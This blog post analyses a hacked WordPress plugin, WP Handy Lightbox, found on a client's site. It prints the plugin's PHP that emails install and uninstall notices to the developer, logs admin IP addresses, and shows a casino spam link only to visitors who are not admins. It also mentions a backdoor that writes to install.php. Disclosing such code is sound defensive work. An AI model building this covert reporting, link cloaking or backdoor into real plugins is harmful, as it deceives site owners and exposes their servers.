Dead Eye Creative
Select Page

WP Handy Lightbox WordPress Plugin Vulnerability and/or Hack

I found a hacked wordpress plugin on one of my clients websites and thought I would post about it to show everyone what I found. The WP Handy Lightbox WordPress Plugin was emailing the developer: hansenmartinwew@gmail.com and telling if it was installed or uninstalled. It would log the IP of the admins. When you went to the site, it would check to see if you where an admin with your ip, then if you where not it would add a spam link on all pages. Inserting code into the situation really could have been a lot more destructive. Cool little script really. It could do so much more.

This code emails the developer with the location of the install:

/*

function actithelightbox_activate() {

$yourip = $_SERVER[‘REMOTE_ADDR’];
$fp = fopen($_SERVER[‘DOCUMENT_ROOT’] . ‘/wp-content/plugins/wp-handy-lightbox/welcome.txt’, ‘w’);
fwrite($fp, $yourip);
fclose($fp);
add_option(‘redirectlightbox_do_activation_redirect’, true);
session_start(); $subj = get_option(‘siteurl’); $msg = “Plugin Activated”; $from = get_option(‘admin_email’); mail(“xxx@gmail.com”, $subj, $msg, $from);
wp_redirect(‘../wp-admin/options-general.php?page=jquery-lightbox-options’);
}

/** Uninstall The Plugin */
function deactthelightbox_deactivate() {
session_start(); $subj = get_option(‘siteurl’); $msg = “Plugin Uninstalled”; $from = get_option(‘admin_email’); mail(“xxx@gmail.com”, $subj, $msg, $from);
}

*/

This code checks to see if you are admin – if not it does something.

In this case it was inserting a link for a slot machine gambling site.

/*

/** Install Settings Locally */
function outputseo() {
if (is_user_logged_in()) {
$ip = $_SERVER[‘REMOTE_ADDR’];
$filename = $_SERVER[‘DOCUMENT_ROOT’] . ‘/wp-content/plugins/wp-handy-lightbox/welcome.txt’;
$handle = fopen($filename, “r”);
$contents = fread($handle, filesize($filename));
fclose($handle);
$filestring= $contents;
$findme = $ip;
$pos = strpos($filestring, $findme);
if ($pos === false) {
$contents = $contents . $ip;
$fp = fopen($_SERVER[‘DOCUMENT_ROOT’] . ‘/wp-content/plugins/wp-handy-lightbox/welcome.txt’, ‘w’);
fwrite($fp, $contents);
fclose($fp);
}

*/

Code shown here checks if you are admin – if not it serves a spam SEO link on the site.

/*

$ip = $_SERVER[‘REMOTE_ADDR’];
$filename = $_SERVER[‘DOCUMENT_ROOT’] . ‘/wp-content/plugins/wp-handy-lightbox/welcome.txt’;
$handle = fopen($filename, “r”);
$contents = fread($handle, filesize($filename));
fclose($handle);
$filestring= $contents;
$findme = $ip;
$pos = strpos($filestring, $findme);
if ($pos === false) {
?>
<a href=”http://www.slotmachines.us.org”>Casino Games</a>
<?php //
} else { echo ”;}
?>

*/

Here are screenshots of the code with explanations.

Creates spam link if not admin

Creates spam link if not admin

This is what the link looked like – upper left hand corner

spam link location

Copies all of the admin IP addresses

copies all admin IPs

emails on uninstall

emails when deactivating

Here is the vulnerability. It allows writing to a file install.php – this is where the link was being added – you could do more with it

allows dev to upload to server

emails the developer upon installation

emails the dev some info

showing specifically the link in was inserting on the site in question

checks to see if you are admin, if not serves link spam

WordPress Vulnerability

This is a backdoor. An easy way for someone from outside to insert code onto your server. You could do a lot of damage with this.

showing the emails it was sending on install and uninstall

emails to the dev just install info

this was the search where I found part of the code in the first place on the clients server.

Search code for link spam




Pin It on Pinterest

Share This